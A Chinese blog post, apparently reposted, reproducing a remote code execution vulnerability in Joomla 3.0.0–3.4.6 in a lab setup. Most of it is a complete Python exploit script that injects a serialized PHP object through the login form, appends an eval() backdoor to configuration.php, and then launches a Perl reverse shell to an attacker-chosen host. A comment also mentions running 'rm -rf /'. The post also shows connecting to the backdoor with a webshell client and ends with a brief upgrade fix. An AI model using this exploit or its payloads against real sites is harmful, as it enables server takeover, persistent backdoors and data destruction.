码迷,mamicode.com
首页 > 其他好文 > 详细

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

时间:2019-10-13 00:23:22      阅读:186      评论:0      收藏:0      [点我收藏+]

标签:eva   false   bs4   eset   soc   查看   app   connect   ace   

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

 

一、漏洞描述

 

Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。

二、漏洞影响版本

Joomla 3.0.0-3.4.6 

三、漏洞环境搭建

靶机:win7(使用phpstudy搭建环境)    ip:192.168.10.171

攻击机:kali    ip:192.168.10.140

1、下载joomla 3.4.6下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6

2、设置网站名、管理员邮箱、用户名、密码等

  技术图片

3、连接数据库

  技术图片

 

4、安装完成之后,需要删除安装目录 

  技术图片

5、成功安装

  技术图片

四、漏洞复现

1、使用脚本进行验证,下图说明漏洞存在(显示”Vulnerable”证明存在漏洞)

python3 joomla3.4.6-rce.py -t  http://192.168.10.171/joomla/

  技术图片

2、脚本内容(或者见joomla3.4.6-rce.py文件)

#!/usr/bin/env python3
 
import requests
from bs4 import BeautifulSoup
from colorama import init
import sys
import string
import random
import argparse
from termcolor import colored
 
init(autoreset=True)
PROXS = {http:127.0.0.1:8080}
PROXS = {}
 
def random_string(stringLength):
        letters = string.ascii_lowercase
        return ‘‘.join(random.choice(letters) for i in range(stringLength))
 
 
backdoor_param = random_string(50)
 
def print_info(str):
        print(colored("[*] " + str,"cyan"))
 
def print_ok(str):
        print(colored("[+] "+ str,"green"))
 
def print_error(str):
        print(colored("[-] "+ str,"red"))
 
def print_warning(str):
        print(colored("[!!] " + str,"yellow"))
 
def get_token(url, cook):
        token = ‘‘
        resp = requests.get(url, cookies=cook, proxies = PROXS)
        html = BeautifulSoup(resp.text,html.parser)
        # csrf token is the last input
        for v in html.find_all(input):
                csrf = v
        csrf = csrf.get(name)
        return csrf
 
 
def get_error(url, cook):
        resp = requests.get(url, cookies = cook, proxies = PROXS)
        if Failed to decode session object in resp.text:
                #print(resp.text)
                return False
        #print(resp.text)
        return True
 
 
def get_cook(url):
        resp = requests.get(url, proxies=PROXS)
        #print(resp.cookies)
        return resp.cookies
 
 
def gen_pay(function, command):
        # Generate the payload for call_user_func(FUNCTION,COMMAND)
        template = s:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}
        #payload =  command +  || $a=\‘http://wtf\‘;
        payload =  http://l4m3rz.l337/; + command
        # Following payload will append an eval() at the enabled of the configuration file
        #payload =  file_put_contents(\‘configuration.php\‘,\‘if(isset($_POST[\\\‘test\\\‘])) eval($_POST[\\\‘test\\\‘]);\‘, FILE_APPEND) || $a=\‘http://wtf\‘;
        function_len = len(function)
        final = template.replace(PAYLOAD,payload).replace(LENGTH, str(len(payload))).replace(FUNC_NAME, function).replace(FUNC_LEN, str(len(function)))
        return final
 
def make_req(url , object_payload):
        # just make a req with object
        print_info(Getting Session Cookie ..)
        cook = get_cook(url)
        print_info(Getting CSRF Token ..)
        csrf = get_token( url, cook)
 
        user_payload = \\0\\0\\0 * 9
        padding = AAA # It will land at this padding
        working_test_obj = s:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}
        clean_object = A";s:5:"field";s:10:"AAAAABBBBB # working good without bad effects
 
        inj_object = ";
        inj_object += object_payload
        inj_object += s:6:"return";s:102: # end the object with the return part
        password_payload = padding + inj_object
        params = {
            username: user_payload,
            password: password_payload,
            option:com_users,
            task:user.login,
            csrf :1
            }
 
        print_info(Sending request ..)
        resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
        return resp.text
 
def get_backdoor_pay():
        # This payload will backdoor the the configuration .PHP with an eval on POST request
 
        function = assert
        template = s:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}
        # payload =  command +  || $a=\‘http://wtf\‘;
        # Following payload will append an eval() at the enabled of the configuration file
        payload =  file_put_contents(\‘configuration.php\‘,\‘if(isset($_POST[\\\‘ + backdoor_param +\\\‘])) eval($_POST[\\\‘+backdoor_param+\\\‘]);\‘, FILE_APPEND) || $a=\‘http://wtf\‘;
        function_len = len(function)
        final = template.replace(PAYLOAD,payload).replace(LENGTH, str(len(payload))).replace(FUNC_NAME, function).replace(FUNC_LEN, str(len(function)))
        return final
 
def check(url):
        check_string = random_string(20)
        target_url = url + index.php/component/users
        html = make_req(url, gen_pay(print_r,check_string))
        if check_string in html:
                return True
        else:
                return False
 
def ping_backdoor(url,param_name):
        res = requests.post(url + /configuration.php, data={param_name:echo \‘PWNED\‘;}, proxies = PROXS)
        if PWNED in res.text:
                return True
        return False
 
def execute_backdoor(url, payload_code):
        # Execute PHP code from the backdoor
        res = requests.post(url + /configuration.php, data={backdoor_param:payload_code}, proxies = PROXS)
        print(res.text)
 
def exploit(url, lhost, lport):
        # Exploit the target
        # Default exploitation will append en eval function at the end of the configuration.pphp
        # as a bacdoor. btq if you do not want this use the funcction get_pay(php_function,parameters)
        # e.g. get_payload(system,rm -rf /)
 
        # First check that the backdoor has not been already implanted
        target_url = url + index.php/component/users
 
        make_req(target_url, get_backdoor_pay())
        if ping_backdoor(url, backdoor_param):
                print_ok(Backdoor implanted, eval your code at  + url + /configuration.php in a POST with  + backdoor_param)
                print_info(Now it\‘s time to reverse, trying with a system + perl)
                execute_backdoor(url, system(\‘perl -e \\\‘use Socket;$i="+ lhost +";$p=+ str(lport) +;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\‘\‘);)
 
 
if __name__ == __main__:
        parser = argparse.ArgumentParser()
        parser.add_argument(-t,--target,required=True,help=Joomla Target)
        parser.add_argument(-c,--check, default=False, action=store_true, required=False,help=Check only)
        parser.add_argument(-e,--exploit,default=False,action=store_true,help=Check and exploit)
        parser.add_argument(-l,--lhost, required=--exploit in sys.argv, help=Listener IP)
        parser.add_argument(-p,--lport, required=--exploit in sys.argv, help=Listener port)
        args = vars(parser.parse_args())
 
        url = args[target]
        if(check(url)):
                print_ok(Vulnerable)
                if args[exploit]:
                        exploit(url, args[lhost], args[lport])
                else:
                        print_info(Use --exploit to exploit it)
 
        else:
                print_error(Seems NOT Vulnerable ;/)

3、使用exp生成一个木马,下图可以看到成功在目标生成木马

python3 joomla3.4.6-rce.py -t  http://192.168.10.171/joomla/ --exploit --lhost 192.168.10.140 --lport 9999    // 用于监听的主机的ip和一个不占用的端口

  技术图片

4、在靶机上查看configuration.php文件,发现在末尾被写入木马

  技术图片

5、使用菜刀连接

  技术图片

 

 五、修复方法

1、更新至最新版本3.9.12

 

 

----------------------------------------------------------------------------------------

参考: https://www.secpulse.com/archives/115192.html

https://blog.csdn.net/weixin_43886632/article/details/102461974

exp: https://github.com/kiks7/rusty_joomla_rce

 

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

标签:eva   false   bs4   eset   soc   查看   app   connect   ace   

原文地址:https://www.cnblogs.com/yuzly/p/11663739.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!